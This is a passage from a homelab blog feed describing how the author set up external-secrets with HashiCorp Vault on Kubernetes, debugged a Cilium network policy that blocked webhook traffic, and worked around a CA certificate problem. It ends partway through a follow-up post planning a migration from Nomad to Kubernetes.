</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">vault</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;secret&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;v1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">appRole</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#75715e"># RoleID configured in the App Role authentication backend</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">roleId</span>: {{ <span style="color:#ae81ff">.Values.approleId }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#75715e"># Reference to a key in a K8 Secret that contains the App Role SecretId</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;my-approle-secret&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secretId&#34;</span>
</span></span></code></pre></div><p>In addition to this, I&rsquo;m also deploying two more secrets, one for my internal
CA and one with the AppRole <code>secret_id</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-approle-secret</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretId</span>: {{ <span style="color:#ae81ff">.Values.approleSecretId | b64enc }}</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>These are getting their values from the following lines in the <code>values.yaml.gotmpl</code>
file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">approleSecretId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/my_kubernetes_secrets/role-secret#/secret-id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>As mentioned before, I&rsquo;m using Helmfile&rsquo;s templating capabilities here. If
you&rsquo;re not using Helmfile, you will have to get the secrets created in a different
way.
For me, this approach has the advantage of having absolutely everything under
version control while not exposing any secrets.</p>
<p>While trying to deploy the <code>ClusterSecretStore</code>, I hit two problems I will
describe in detail in a later section.</p>
<p>For now, the above config works.</p>
<h1 id="deploying-a-secret">Deploying a secret</h1>
<p>To test the setup, I created a fresh dummy secret in Vault. First, I pushed
the secret to Vault:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/my_kubernetes_secrets/cluster/testsecret secret<span style="color:#f92672">=</span>supersecretpw
</span></span></code></pre></div><p>Then, an <code>ExternalSecret</code> manifest using the previously created <code>my-vault-store</code>
secret store can be created:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsecret</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">mysecret</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/testsecret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>Once that manifest has been deployed, external-secrets will create a Kubernetes
Secret called <code>testsecret</code> in the namespace <code>external-secrets</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n external-secrets secrets testsecret -o yaml
</span></span><span style="display:flex;"><span>apiVersion: v1
</span></span><span style="display:flex;"><span>data:
</span></span><span style="display:flex;"><span>  mysecret: c3VwZXJzZWNyZXRwdw<span style="color:#f92672">==</span>
</span></span><span style="display:flex;"><span>immutable: false
</span></span><span style="display:flex;"><span>kind: Secret
</span></span><span style="display:flex;"><span>metadata:
</span></span><span style="display:flex;"><span>  annotations:
</span></span><span style="display:flex;"><span>    meta.helm.sh/release-name: external-secrets
</span></span><span style="display:flex;"><span>    meta.helm.sh/release-namespace: external-secrets
</span></span><span style="display:flex;"><span>    reconcile.external-secrets.io/data-hash: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>  creationTimestamp: <span style="color:#e6db74">&#34;2023-12-26T12:01:30Z&#34;</span>
</span></span><span style="display:flex;"><span>  labels:
</span></span><span style="display:flex;"><span>    app.kubernetes.io/managed-by: Helm
</span></span><span style="display:flex;"><span>    reconcile.external-secrets.io/created-by: <span style="color:#ae81ff">1235</span>
</span></span><span style="display:flex;"><span>  name: testsecret
</span></span><span style="display:flex;"><span>  namespace: external-secrets
</span></span><span style="display:flex;"><span>  ownerReferences:
</span></span><span style="display:flex;"><span>  - apiVersion: external-secrets.io/v1beta1
</span></span><span style="display:flex;"><span>    blockOwnerDeletion: true
</span></span><span style="display:flex;"><span>    controller: true
</span></span><span style="display:flex;"><span>    kind: ExternalSecret
</span></span><span style="display:flex;"><span>    name: testsecret
</span></span><span style="display:flex;"><span>    uid: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>  resourceVersion: <span style="color:#e6db74">&#34;1839454&#34;</span>
</span></span><span style="display:flex;"><span>  uid: <span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>type: Opaque
</span></span></code></pre></div><p>Here, <code>target.name</code> is the name of the secret to be created, with <code>target.namespace</code>
being the namespace to deploy to.
Under <code>data</code>, the <code>secretKey</code> is the key under which the secret data will be
stored in the newly created Secret, and <code>remoteRef.key</code> is the path to the
secret in Vault, with <code>remoteRef.property</code> being the property of the resulting
JSON object at that path which contains the value to be stored in <code>secretKey</code>.</p>
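<p>As a quick sanity check, the sync status of the <code>ExternalSecret</code> itself can be
inspected before looking at the resulting Secret. These are generic external-secrets
commands, not taken from my shell history:</p>
<pre tabindex="0"><code>kubectl get -n external-secrets externalsecret testsecret
kubectl describe -n external-secrets externalsecret testsecret
</code></pre>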
<h1 id="network-policy-problems">Network policy problems</h1>
<p>While working on deploying specifically the Vault <code>ClusterSecretStore</code>, I
hit multiple errors. The first one was this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>Error: UPGRADE FAILED: cannot patch <span style="color:#e6db74">&#34;vault-backend&#34;</span> with kind ClusterSecretStore: Internal error occurred: failed calling webhook <span style="color:#e6db74">&#34;validate.clustersecretstore.external-secrets.io&#34;</span>: failed to call webhook: Post <span style="color:#e6db74">&#34;https://external-secrets-webhook.external-secrets.svc:443/validate-external-secrets-io-v1beta1-clustersecretstore?timeout=5s&#34;</span>: context deadline exceeded
</span></span></code></pre></div><p>It appeared whenever I tried to deploy the new <code>ClusterSecretStore</code>. I finally
twigged to the fact that this was likely to do with my <code>CiliumNetworkPolicy</code>,
which at that point looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span></code></pre></div><p>This is the canonical network policy for allowing all egress, while blocking
all ingress to all pods inside the namespace, save for traffic from pods in the same
namespace.
So I was extremely confused when I saw that network requests were getting
blocked. I removed the policy, and the deployment of the secret store worked
fine.</p>
<p>First, I confirmed that the policy was actually applied correctly. This can
be done with <a href="https://cilium.io/">Cilium</a>, the CNI plugin I&rsquo;m using, as follows.
Some documentation on troubleshooting can be found <a href="https://docs.cilium.io/en/stable/operations/troubleshooting/">here</a>.</p>
<p>To start, get the host where the pod whose traffic is being blocked is running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -n external-secrets -o wide
</span></span><span style="display:flex;"><span>NAME                                               READY   STATUS    RESTARTS   AGE   IP           NODE     NOMINATED NODE   READINESS GATES
</span></span><span style="display:flex;"><span>external-secrets-7fcd5969c8-sltbl                  1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.4.173   sait     &lt;none&gt;           &lt;none&gt;
</span></span><span style="display:flex;"><span>external-secrets-cert-controller-fc578ccdd-mcksx   1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.4.168   sait     &lt;none&gt;           &lt;none&gt;
</span></span><span style="display:flex;"><span>external-secrets-webhook-68c99c7557-nrqpz          1/1     Running   <span style="color:#ae81ff">0</span>          25h   10.8.5.60    sehith   &lt;none&gt;           &lt;none&gt;
</span></span></code></pre></div><p>Next, check which Cilium pod runs on that specific host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -n kube-system -o wide
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>cilium-wcffs                       1/1     Running   <span style="color:#ae81ff">0</span>               5d22h   10.86.5.205   sehith   &lt;none&gt;           &lt;none&gt;
</span></span></code></pre></div><p>Then, I needed the correct Cilium endpoint for the pod I was interested in:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium endpoint list
</span></span><span style="display:flex;"><span>ENDPOINT   POLICY <span style="color:#f92672">(</span>ingress<span style="color:#f92672">)</span>   POLICY <span style="color:#f92672">(</span>egress<span style="color:#f92672">)</span>   IDENTITY   LABELS <span style="color:#f92672">(</span>source:key<span style="color:#f92672">[=</span>value<span style="color:#f92672">])</span>                                                       IPv6   IPv4         STATUS   
</span></span><span style="display:flex;"><span>           ENFORCEMENT        ENFORCEMENT                                                                                                                        
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">1101</span>       Enabled            Disabled          <span style="color:#ae81ff">29452</span>      k8s:app.kubernetes.io/instance<span style="color:#f92672">=</span>external-secrets                                          10.8.5.60    ready   
</span></span><span style="display:flex;"><span>                                                           k8s:app.kubernetes.io/name<span style="color:#f92672">=</span>external-secrets-webhook                                                           
</span></span></code></pre></div><p>Finally armed with the <code>ENDPOINT</code> identifier, <code>1101</code> here, we can display the
policy rules applied to it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium endpoint get -o yaml <span style="color:#ae81ff">1101</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>rule: <span style="color:#e6db74">&#39;{&#34;port&#34;:0,&#34;protocol&#34;:&#34;ANY&#34;,&#34;l7-rules&#34;:[{&#34;\u0026LabelSelector{MatchLabels:map[string]string{k8s.io.kubernetes.pod.namespace: external-secrets,},MatchExpressions:[]LabelSelectorRequirement{},}&#34;:null},]}&#39;</span>
</span></span></code></pre></div><p>This was exactly the rule I was expecting - allowing all traffic from the
<code>external-secrets</code> namespace.
While digging through all this, I also checked Cilium&rsquo;s monitoring for the endpoint,
which can be done like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-wcffs -- cilium monitor --type drop
</span></span></code></pre></div><p>It spat out lines like this whenever I tried to deploy the secret store:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1101, ifindex 6, file bpf_lxc.c:1968, , identity remote-node-&gt;29452: 10.8.0.17:59258 -&gt; 10.8.5.60:10250 tcp SYN
</code></pre><p>What I did not realize for way too long: The source IP, <code>10.8.0.17</code>, wasn&rsquo;t
coming from any pod in my entire cluster. I just couldn&rsquo;t figure out what that
IP was. It&rsquo;s in the CIDR for my cluster pods, but it&rsquo;s not showing up in the
<code>kubectl get -A pods -o wide</code> output.</p>
<p>After an exceedingly long time spent searching for the root cause, I finally
found it, through sheer dumb luck. I had switched into the terminal of my VM
host, where the output of a previous <code>lxc ls</code> command was still visible.
And lo and behold, there was the IP, as the <code>cilium_host</code> network interface for
one of my control plane nodes.</p>
<p>Some digging later, I found out that this is a network interface created by
Cilium, and it is used for the traffic of all static and host-networking
pods on a host.
This also explained why I never saw any error in the logs of any of the
external-secrets pods. The request wasn&rsquo;t made by any of them. The <code>webhook</code>
pod runs a webhook which is used when deploying new secret stores, to verify
them before the Kubernetes objects are created.
This means the hook isn&rsquo;t triggered by any external-secrets pod, but by the
kube-apiserver.</p>
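<p>For anyone trying to confirm something similar: the <code>cilium_host</code> address can
be checked directly on the node in question. This is just the generic iproute2
invocation, not a transcript from my machine:</p>
<pre tabindex="0"><code>ip -brief addr show dev cilium_host
</code></pre>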
<p>Going a bit further, I just wanted to allow the kube-apiserver ingress into
the webhook pod. This also did not work, because there wasn&rsquo;t actually any
identity for it, as the pod&rsquo;s networking is not controlled by Cilium.</p>
<p>After a while, I looked back at the Cilium monitoring line:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1101, ifindex 6, file bpf_lxc.c:1968, , identity remote-node-&gt;29452: 10.8.0.17:59258 -&gt; 10.8.5.60:10250 tcp SYN
</code></pre><p>Note the <code>identity remote-node</code>. Luckily, Cilium defines an entity for that,
see the docs <a href="https://docs.cilium.io/en/latest/security/policy/language/#entities-based">here</a>.
So what finally solved my problem was to add the following network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-allow-webhook-all&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">external-secrets-webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">remote-node</span>
</span></span></code></pre></div><p>This allows ingress to the webhook pod from any remote node. These remote nodes
are all nodes in the Kubernetes cluster which are not the local node where
the pod is running. It isn&rsquo;t quite as secure as explicitly defining that
only the kube-apiserver pods can access the webhook pod, but it will have
to do for now, as the kube-apiserver is not under Cilium control and hence
cannot be selected via, for example, its labels. I will have to return
to this issue at a later point and see whether I can do better.</p>
<h2 id="the-ca-cert-formatting-problem">The CA cert formatting problem</h2>
<p>After I had finally fixed the networking issue, I got another error, this time from
the external-secrets pod itself. It was not able to connect to Vault:</p>
<pre tabindex="0"><code>[...]&#34;error&#34;:&#34;could not get provider client: unable to log in to auth met hod: unable to log in with app role auth: Put \&#34;https://vault.example.com/v1/auth/approle/login\&#34;: tls: failed to verify certificate: x509: certificate signed by unknown authority&#34;[...]
</code></pre><p>This was somewhat expected, because my Vault access does not go through my
proxy, and uses my Homelab internal CA.</p>
<p>I thought this problem would be easily fixable, as external-secrets does provide
settings in the <code>ClusterSecretStore</code> for providing a CA cert for server cert
validation. See the docs <a href="https://external-secrets.io/latest/api/spec/#external-secrets.io/v1beta1.VaultProvider">here</a>.
But I had really rotten luck with the <code>caBundle</code> config. I&rsquo;m getting the PEM
formatted CA cert directly from Vault, which runs my internal CA. But I couldn&rsquo;t
get it into a format which external-secrets would accept. Whatever I tried,
introducing newlines, putting the cert through <code>b64enc</code>, nothing worked. I was
just getting CA cert parsing errors from external-secrets.</p>
<p>What finally worked was to use the <code>caProvider</code> option instead. For this,
I created an additional secret (even though the CA cert isn&rsquo;t exactly a secret):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>And then I used that secret in the <code>caProvider</code> section as seen above. This was
an extremely frustrating journey. With the networking problem, I at least
learned something about Cilium networking and how to debug it, and I finally found
the root cause and an acceptable fix.
But in this case, the only thing I got out of it was a high dose of frustration
and a workaround that switches to a completely different approach.</p>
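<p>For anyone debugging something similar, it can help to verify that the CA cert
actually arrives in the Secret as intact PEM. A generic check, using the secret
name from above:</p>
<pre tabindex="0"><code>kubectl get -n external-secrets secret my-internal-ca \
  -o jsonpath=&#39;{.data.caCert}&#39; | base64 -d | openssl x509 -noout -subject
</code></pre>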
<h1 id="conclusion">Conclusion</h1>
<p>First service set up successfully on the production k8s cluster. &#x1f389;
But it also brought a lot of frustration. Finding the fix for the networking problem
took a while, but at least I learned a bit about Cilium debugging.
The CA cert formatting problem, on the other hand, just got me riled up.</p>
<p>If anyone reading this has any good ideas about how to produce a Cilium network
policy which only allows access from the kube-apiserver instead of the
&ldquo;allow all cluster nodes&rdquo; setup I&rsquo;ve got now, hit me up on the <a href="https://social.mei-home.net/@mmeier">Fediverse</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 0: The Plan</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-0-plan/</link>
      <pubDate>Mon, 18 Dec 2023 21:53:39 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-0-plan/</guid>
      <description>My plan for migrating my Nomad cluster to Kubernetes</description>
      <content:encoded><![CDATA[<p>In a <a href="https://blog.mei-home.net/posts/hashipocalypse/">previous post</a>, I had noted that
due to HashiCorp&rsquo;s recent decisions about the licensing for their tools, I
was thinking about switching away from Nomad as my workload scheduler.</p>
<p>Since then, HashiCorp made a change to the Terraform registry&rsquo;s Terms of Service
which only allowed usage with HashiCorp Terraform. This was obviously an action
against <a href="https://opentofu.org/">OpenTOFU</a>, and it reeked of pure spite. That
turned my musings about the future of my Homelab from &ldquo;okay, this leaves a bad taste&rdquo;
to &ldquo;Okay, I just lost all trust in HashiCorp&rdquo;. So Kubernetes it is.</p>
<p>Just to make one thing clear: Both Nomad and Consul, which I will be replacing
here, worked great for me. They provided everything I could have wished for, in
a rather lightweight package. And the integration was excellent. I also think
the documentation for all HashiCorp tools deserves a lot of praise.
There&rsquo;s no technical reason to replace Nomad and Consul. It&rsquo;s purely due to the
license change, and even more so due to the ToS change which followed.</p>
<p>After <a href="https://blog.mei-home.net/tags/kubeexp/">some experimentation</a> with Kubernetes, I&rsquo;m
satisfied that it&rsquo;s going to work for everything which I&rsquo;m currently doing with
Nomad, and I&rsquo;ve spent the last few weeks making a plan to migrate.</p>
<p>My one main goal here is to make the migration as incremental as possible.
To me, this has the advantage of reducing the pressure, because I can just
migrate service-by-service, slowly, at any pace which fits the rest of my life.</p>
<p>To this end, I intend to run my Nomad and Kubernetes clusters in parallel. The
one big problem with this: Depending on time and motivation, this might draw
out the migration quite a bit. I might still be running two workload schedulers
come spring 2024. &#x1f605;</p>
<h1 id="the-current-situation">The current situation</h1>
<p>Let&rsquo;s start with the current state.
<figure>
    <img loading="lazy" src="homelab-before.svg"
         alt="A stylized graphic of my Homelab setup. In the middle are eight boxes containing the Raspberry Pi, Nomad and Consul logos. They are all labeled &#39;Raspberry Pi CM4 8G Worker&#39;. Above them are three further boxes, with all the previous logos plus the Ceph and Vault logo. They are labeled Raspberry Pi 4 4GB Controller. To the side are three more boxes, only containing the Ceph logo labeled &#39;Ceph Storage Host&#39;"/> <figcaption>
            <p>The current state of my Homelab.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;m running most of the Homelab on Raspberry Pi 4s. Three of them with 4GB RAM serve as controllers,
hosting one Vault, Nomad and Consul server as well as Ceph MON daemons each,
for high availability purposes. My main workhorses are the eight Pi CM4 with 8GB,
each hosting a Consul and Nomad client running my workloads. Storage is provided
by three x86 machines, each with one HDD and one SSD.</p>
<p>Nomad is the main workload scheduler. Consul provides both service discovery
and authenticated, encrypted connections between different Nomad jobs.
Vault is used for secrets, not only within Nomad jobs but also for example by
my Ansible playbooks.</p>
<p>Ceph provides storage to Nomad jobs via CSI as well as the root disks for the
eight worker Pis, which <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">netboot</a> and
are completely diskless.</p>
<p>At the time of writing, 70% of the cluster&rsquo;s CPU and 46% of the RAM are assigned
to jobs. But in reality, the cluster overall is about 90% CPU idle. All of this
together currently eats about 150W.</p>
<h1 id="the-plan">The Plan</h1>
<p>As noted, I would like to do the migration incrementally, keeping everything up
as much as possible. The first challenge was getting enough hardware to run the
two clusters in parallel. Luckily, I&rsquo;ve got my old x86 machine from before I
ventured into multi-host territory. It is an Intel 8C/16T CPU with 64 GB of RAM
and a couple 500 GB SSDs. That&rsquo;s more than enough power to run my entire
Homelab, if necessary.
In addition, I&rsquo;ve got my spare disks for when one of the prod disks fails, a
2TB SSD and a 6TB HDD.</p>
<p>I already used the x86 machine as the host for my Kubernetes experiments and
will now use it in a similar way, with LXD VMs running three Kubernetes controllers,
one Ceph host for using the disks and a couple worker VMs.</p>
<h2 id="preparation">Preparation</h2>
<p>To begin with, I will create the aforementioned VMs and init the cluster itself.
After that, I will migrate the first host. This will also double as a test to
see whether everything works fine on Raspberry Pis, and I will also be writing
an Ansible playbook to remove all the Nomad cluster&rsquo;s tools from a host.</p>
<p>Once that&rsquo;s done, the first couple of services will be foundational stuff, like
<code>external-dns</code> and <code>external-secrets</code>. Then the first migrated Pi will become
the Ingress host with a <code>Traefik</code> deployment.</p>
<h2 id="ceph">Ceph</h2>
<p>I will continue using Ceph. It has served me very well in the past two years and
I know my way around it by now. But instead of continuing with the current
baremetal cluster, I will go with <a href="https://rook.io/">Ceph Rook</a>, a Ceph cluster
deployed in Kubernetes. This approach has the advantage that I will be
able to use the Ceph hosts for workloads other than Ceph as well.</p>
<p>Sadly, Ceph Rook does not support any kind of import from a baremetal cluster.
There is no way to create daemons in Rook and join them into a baremetal cluster.
As a consequence of that, I will be setting up a fresh cluster in Kubernetes,
and then slowly migrate the data over as I migrate hosts and services from Nomad
to Kubernetes. Luckily, my cluster is still empty enough that I can take one
host out of the baremetal cluster and add it, along with its disks, to the Rook
cluster. That way, the Rook cluster will consist of one VM using my spare disks
plus one of the baremetal hosts, while the other two baremetal hosts stay in the
baremetal cluster.
<p>For the data transfer, I will very likely just use <code>rsync</code>. A volume-level
export/import doesn&rsquo;t make much sense, especially for CSI volumes: they will be
created and maintained by Rook/Kubernetes, so importing them as whole volumes would need
